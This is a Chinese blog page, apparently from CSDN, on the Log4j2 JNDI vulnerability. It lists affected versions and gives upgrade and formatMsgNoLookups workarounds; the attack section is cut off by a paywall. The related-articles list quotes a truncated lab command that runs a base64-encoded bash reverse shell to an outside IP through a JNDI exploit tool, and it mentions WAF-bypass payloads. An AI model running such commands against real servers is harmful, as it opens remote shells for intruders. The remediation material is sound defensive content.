Log4j史诗级漏洞,我们这些小公司能做些什么?

于 2025-01-18 06:14:48 发布
阅读量795 收藏 13
点赞数 28
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2501_90249203/article/details/145218736
版权

Apache Log4j2是一款优秀的Java日志框架,与Logback平分秋色,大量主流的开源框架采用了Log4j2,像Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。所以,这样一个底层框架出现问题,影响面可想而知。

漏洞信息:Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,需及时更新至 Apache Log4j 2.15.0-rc2 版本。

影响范围:2.0 <= Apache log4j2 <= 2.14.1。

补救方案

方案一:升级版本,发布系统;

方案二:临时补救:

  • 修改JVM参数,设置 -Dlog4j2.formatMsgNoLookups=true

  • 在涉及漏洞的项目的类路径(classpath)下增加log4j2.component.properties配置文件并增加配置项log4j2.formatMsgNoLookups=true

  • 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true。

攻击原理

攻击伪代码示例:

import org.apache.log4j.Logger;

import java.io.*;

import java.sql.SQLException;

import java.util.*

最低0.47元/天 解锁文章
史诗漏洞爆发,Log4j 背后的开源人何去何从?
m0_50065287的博客
12-13 1万+
开源并不如我们想象的那般光鲜。
log4j日志漏洞问题
feinifi的博客
11-16 4225
log4j远程漏洞复现以及对这个漏洞问题的看法。
Log4j2漏洞复现&原理&补丁绕过
最新发布
无问社区的博客
07-17 763
我tm都呕了,昨晚出了这个洞,在家复现半天没搞出来,然后凌晨快两点的时候成功了两次,然后又不行,然后睡了,贼jb真实。然后今天来公司随便搞了两下就成功了,唯一的变化就是换了台电脑,贼jb恐怖。经过测试就是jdk版本的问题。0x02 漏洞复现这里我一共使用了两个jdk版本8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。今天来公司也是用的8u202版本的jdk,成功了。
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
Log4j2漏洞复现&补丁绕过
AI
06-10 1036
8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。我仔细研究了两者的不同,我发现唯一不同的就是我公司这个idea启的proiect带有springboot的库.然后看了默安的一篇文章。他这里是用的System.setProperty来的用的是rmi,和网上通用的ldap的poc不同,也是去请求一个外链,协议不同而已,不过通常情况下rmi限制更多详细用法可以参考fastjson的利用。安恒这个,我猜测和我遇到了一样的问题,所以没从本地复现,我猜测是这样,不一定对。
log4j RCE waf 绕过技巧
weixin_50464560的博客
07-09 1983
log4j waf 绕过技巧 - ph4nt0mer - 博客园 (cnblogs.com)原来的poc: Copy绕过的poc: Copy可行 Copy不一定可行 Copy可行unico字符串下列表达式均等价于abc: Copylog4j poc集合 https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis● 不出现port,避免被waf匹配ip:port Copy
【转载】二次通告--Apache log4j-2.15.0-rc1版本存在绕过风险,请广大用户尽快更新版本
jason的java世界
12-10 1176
【转载自360众测】 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 2021年12月09日,360漏洞云监测到Apache 官方于2021年12月07日发布了log4j-2.15.0-rc1版本。经360漏洞云安全专家研...
刚刚公布的 Log4J史诗安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5508
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
Log4j 史诗漏洞,京东这样的大厂都中招了
aa119101的博客
06-20 278
昨天晚上一个 Apache Log4j2 的高危漏洞被公开了,这个远程代码执行漏洞堪称史诗别的漏洞。Apache Log4j2 这个组件有多少公司在用,这个不用我多说吧,实在是太多了。不知道昨晚有多少程序员半夜起床改代码呢?漏洞原理官方表述是:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替
log4j漏洞分析
遇事不决冲冲冲
03-22 2461
Log4j漏洞复现步骤,Log4j断点分析,Log4j漏洞中2.15.0-RC1断定分析,以及绕过方法,Log4j2.15.0-RC2修复原理
安全漏洞Log4j2漏洞复现绕过分析
AzulSystems的博客
03-04 275
Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告分配CVE编号:CVE-2021-44228CVSS评分:10.0(最高只能10分)POC比较简单POC虽然简单,但是搭建LDAP环境显得有点复杂,marshalsec方式需要自行编译class并搭建HTTP服务端java -jar LDAPKit.jar [命令]截图如下【一>所有资源获取
Apache Log4j任意代码执行漏洞修复 spring-boot-starter-log4j2
热门推荐
wzj_vip的专栏
12-10 3万+
spring-boot-starter-log4j2修复方式 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-log4j2</artifactId> </dependency> 替换为: <dependency> <groupId>org.springframe
我院自研安全系统高效响应处置Java史诗安全漏洞
翼安研习社的博客
01-07 2180
作者|陈茂飞、吴波、谢泳 来源| 翼安研习社 发布时间|2021-12-23 近日,广为使用的Apache Log4j2被公开曝露出Log4j2远程代码执行高危漏洞,让安全业界绷紧了神经,官方 CVSS 评分更是高达10.0分。Apache Log4j2是一个基于Java的日志记录工具,在业务系统开发中该日志框架被大量用于记录日志信息。Log4j2中存在的JNDI注入漏洞使得当将特定输入的数据进行日志记录时,即可触发此漏洞,成功利用漏洞可以在目标服务器上执行任意代码。由于该组件在业务项目中使用广泛、.
Log4j 2.16.0发布,受Log4j漏洞影响的Apache项目一览
码农小胖哥
12-14 2161
今天的早些时候陷入CVE-2021-44228漏洞风波的Log4j发布了2.16.0版本。2.16.0版本强化漏洞防御在2.16.0版本版本中完全删除对Message Lookups的支持...
突发!Log4j 再爆“史诗漏洞,Kafka、Elasticsearch等均受影响,速查!修复!...
Java精选
12-11 3245
点击上方“Java精选”,选择“设为星标”别问别人为什么,多问自己凭什么!下方有惊喜留言必回,有问必答!每天08:15更新文章,每天进步一点点...Log4j 2发布于2014年。Ap...
瞎记日志也有错!Log4j2史诗漏洞,影响面极大,味道不好闻!
小姐姐味道
12-10 785
原创:小姐姐味道(微信公众号ID:xjjdog),欢迎分享,转载请保留出处。Log4j今日被曝严重漏洞,作为Java界日志工具的杠把子,Log4j和Logback几乎统一了江湖,影响面不可...
Apache log4j2 漏洞,影响到了千千万万程序员,彻夜修复
天道酬勤
12-11 1万+
可怕的漏洞 Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。 作为 Java 日志界的扛把子,Log4j 和 logback 几乎一统了江湖,影响面不可谓不大,下面我们就来亲身用代码来体会一下这个漏洞。 此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者灵活的读取环境中的配置。 简单点说,就是 log.info("")这行代码中,{}") 这行代码中,")这行代码中,{} 里的变量可以被替换,但是参数内容未严格的控制,导致这个漏
5 分钟复现 log4J 漏洞,手把手实现
weixin_44742132的博客
12-11 2820
2021年12月10日凌晨前,网上曝出了 log4j 的核弹漏洞,这种漏洞高危,操作简单,利用方便,适用范围广,可以直接任意代码执行,接管你的服务器。此处思考曝光者凌晨曝光的原因,或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值